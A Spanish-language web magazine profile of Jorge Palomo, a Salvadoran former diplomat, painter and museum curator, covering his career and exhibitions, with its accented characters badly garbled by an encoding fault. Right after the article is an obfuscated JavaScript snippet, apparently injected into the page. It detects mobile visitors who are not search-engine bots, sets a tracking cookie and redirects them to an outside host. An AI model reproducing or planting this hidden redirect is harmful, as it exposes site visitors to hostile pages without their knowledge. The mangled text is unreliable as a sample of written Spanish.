Sidebar Top

4 Jul 2017
Sidebar Top | Por: Redacción

El ex diplomA?tico y artista salvadoreA�o / Julio 2017

Un ex diplomA?tico de Estados Unidos, cuya verdadera vocaciA?n es el arte, ese es Jorge Palomo. Un curador de arte, museA?grafo y docente, que desde pequeA�o soA�aba con ser artista. Nuestro salvadoreA�o del mes de julio 2017 nos comparte su vida llena de A�xitos dentro de las artes plA?sticas, esta es su historia.

Jorge Palomo es un hombre dedicado al arte en todas sus expresiones, como A�l mismo se define a�?multifacA�ticoa�?. a�?Soy una persona que cree en ser equitativo, igualitario y justo. Soy casi obsesivo en hacer el mejor trabajo que puedo hacer dentro de los lA�mites que se me presentan. Busco trabajo complejo intelectualmente porque me mantiene ocupado, y porque tiendo a ser un poco ansioso y me aburro rA?pidoa�?, afirma.

LeA�: a�?Rodrigo LA?pez, el artista entusiasta por excelencia/ Enero 2017a�?

Desde pequeA�o, Jorge supo que habA�a nacido para el arte. Como parte de sus primeras memorias, quizA?s con tan solo tres aA�os de edad, A�l recuerda dibujar sobre las paredes de su casa y jugar con plastilina, moldeando figuras. A veces se ganaba uno que otro regaA�o por su arte en los muros, pero fue asA� como creciA? su verdadera vocaciA?n. AsA� mismo, Jorge era de los niA�os que tenA�a libros para colorear y crayolas con muchos colores, que usaba para pintar y copiar los muA�equitos de sus caricaturas favoritas. Anhelando asA�, convertirse en el reconocido artista que es en la actualidad.

a�?ReVisiones, Encuentros con el arte salvadoreA�oa�?- 2007, MARTE

Ahora, Jorge es curador de museos, artista plA?stico y museA?grafo, ademA?s docente, pero afirma no haber conocido estas a�?profesiones hasta mucho mayora�?. a�?TomA� clases de arte en la escuela y de manera privada durante mi adolescencia, siempre me gustA? y tuve talento para elloa�?, comenta Palomo.

Conforme fue trascurriendo su vida, Jorge llevaba de la mano el estudio con las artes, y cuando tenA�a la oportunidad, a�?siempre elegA�a tomar clases de arte cuando tuve la opciA?na�?. Se terminA? graduando en administraciA?n de empresas y se licenciA? en mercadeo y gerencia, e incluso llegA? a ser diplomA?tico en Estados Unidos. a�?Fui el Consejero Comercial de la Embajada de El Salvador en Washington, D.C. y a la vez era el Agregado Culturala�?, detalla Jorge.

No obstante, la pasiA?n, el amor por el arte siempre estuvo dentro de su esencia. Jorge finalmente decidiA? seguir su vocaciA?n e ingresA? a�?a la universidad para sacar otra licenciatura, esta vez en Bellas Artes, con una especialidad en Pintura, y luego una maestrA�aa�?. Para el 2002, Jorge comenzA? a participar en exposiciones colectivas, a�?entre ellas la IV Bienal de Artes PlA?sticas del Istmo Centroamericano, realizada en la Ciudad de PanamA?a�?, comenta Jorge.

Ya en el mundo del arte, para Palomo su mA?s grande influencia ha sido David Hockney, a�?pero como inspiraciA?n, los grandes maestros del barroco, renacimiento italiano y del modernismo francA�sa�?.

a�?NoA� Canjura, Hijo de la Luza�?- 2011, MARTE y Museo Forma

Dentro de sus mayores logros, Jorge tuvo la exposiciA?n a�?ReVisiones, Encuentros con el arte salvadoreA�oa�?, semi- permanente en 2007, en el Museo de Arte de El Salvador, MARTE, a la que acudieron mA?s de 200 mil personas. AsA� como, a�?he hecho una gran cantidad de retrospectivas de artistas nacionalesa�?, destacan: a�?NoA� Canjura, Hijo de la Luza�? en 2011 en el MARTE y el Museo Forma; y la retrospectiva de a�?Negra Alvarez, De frutos sagrados y protestas de la tierraa�? en 2012, en MARTE.

Para el 2006, su aficiA?n por el arte habA�a trascendido, fue en ese entonces que Palomo se dedicA? a la a�?investigaciA?n y la curadurA�a casi a tiempo completoa�?. a�?Los curadores somos un grupo bastante limitado, ningA?n museo nacional tiene un curador fijo o de planta, por ende, uno propone proyectos a diversos sitios para llevar a cabo las exhibicionesa�?, explica Jorge.

a�?Negra Alvarez, De frutos sagrados y protestas de la tierraa�?- 2012, MARTE

Por esto, Jorge opina que uno de sus mayores desafA�os como curador de arte independiente y museA?grafo en el paA�s es el nA?mero limitado de espacios para exhibiciA?n a�?y por otro, lograr patrocinios para la investigaciA?n y publicaciA?n de catA?logosa�?. Sin embargo, al conocer coleccionistas de arte privados, obtener el financiamiento ya no es un verdadero obstA?culo, considera Jorge.

Y es asA� como, Jorge tiene un nuevo proyecto, a�?CronologA�a de las Artes Visuales en El Salvadora�?, donde en menos de mil pA?ginas, hace un recorrido por el arte nacional desde la independencia hasta el presente. a�?La idea fue tratar de constatar cuanta informaciA?n logramos captar, gracias a la colaboraciA?n de mA?s de 100 artistas y sus familias, para corregir mucha de la informaciA?n que se tiende a repetir, pero que por diferentes circunstancias, estA? incorrecta; y hacerlo de una manera completamente inclusivaa�?, explica Jorge.

Por otro lado, Jorge tambiA�n ha sido docente en el MARTE, donde compartiA? con sus estudiantes sobre la TeorA�a del Arte y asA� a�?abrir nuevos discursos sobre el arte contemporA?neoa�?. AdemA?s, impartiA? un taller de curadurA�a aplicada al arte salvadoreA�o.

Aunque no se pone metas a largo plazo, Jorge cree que la vida se debe vivir en el presente y selecciona a�?proyectos especA�ficos que me interesan o me provocan algo, y trabajo por hacerlos realidad, como el libro que acaba de publicarsea�?.

A los jA?venes, este artista multifacA�tico salvadoreA�o aconseja que traten a�?de estudiar y trabajar en algo que sostenga sus intereses y pasiones, en vez de estudiar lo que crean que les va a hacer dinero. Necesitamos de toda esa gente que termina en profesiones inusuales como para lograr una sociedad que logre entenderse mejora�?.

SabA� mA?s de nuestro salvadoreA�o del mes y su trabajo, aquA�.

 

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

3 Jul 2018
Rodrigo Bolaños, el salvadoreño detrás de una fábrica de oportunidades
Sidebar Top | Por: Mariana Arévalo

Rodrigo Bolaños, el salvadoreño detrás de una fábrica de oportunidades

5 Jun 2018
Danilo Leiva, el docente de matemáticas inspirador – Junio 2018
Sidebar Top | Por: Mariana Arévalo

Danilo Leiva, el docente de matemáticas inspirador – Junio 2018

1 May 2018
Celina de Sola, la salvadoreña que sabe que trabajando juntos se pueden transformar realidades
Sidebar Top | Por: Mariana Arévalo

Celina de Sola, la salvadoreña que sabe que trabajando juntos se pueden transformar realidades

3 Abr 2018
José Ever Landaverde, el emprendedor de la contabilidad en El Salvador / abril 2018
Sidebar Top | Por: Mariana Arévalo

José Ever Landaverde, el emprendedor de la contabilidad en El Salvador / abril 2018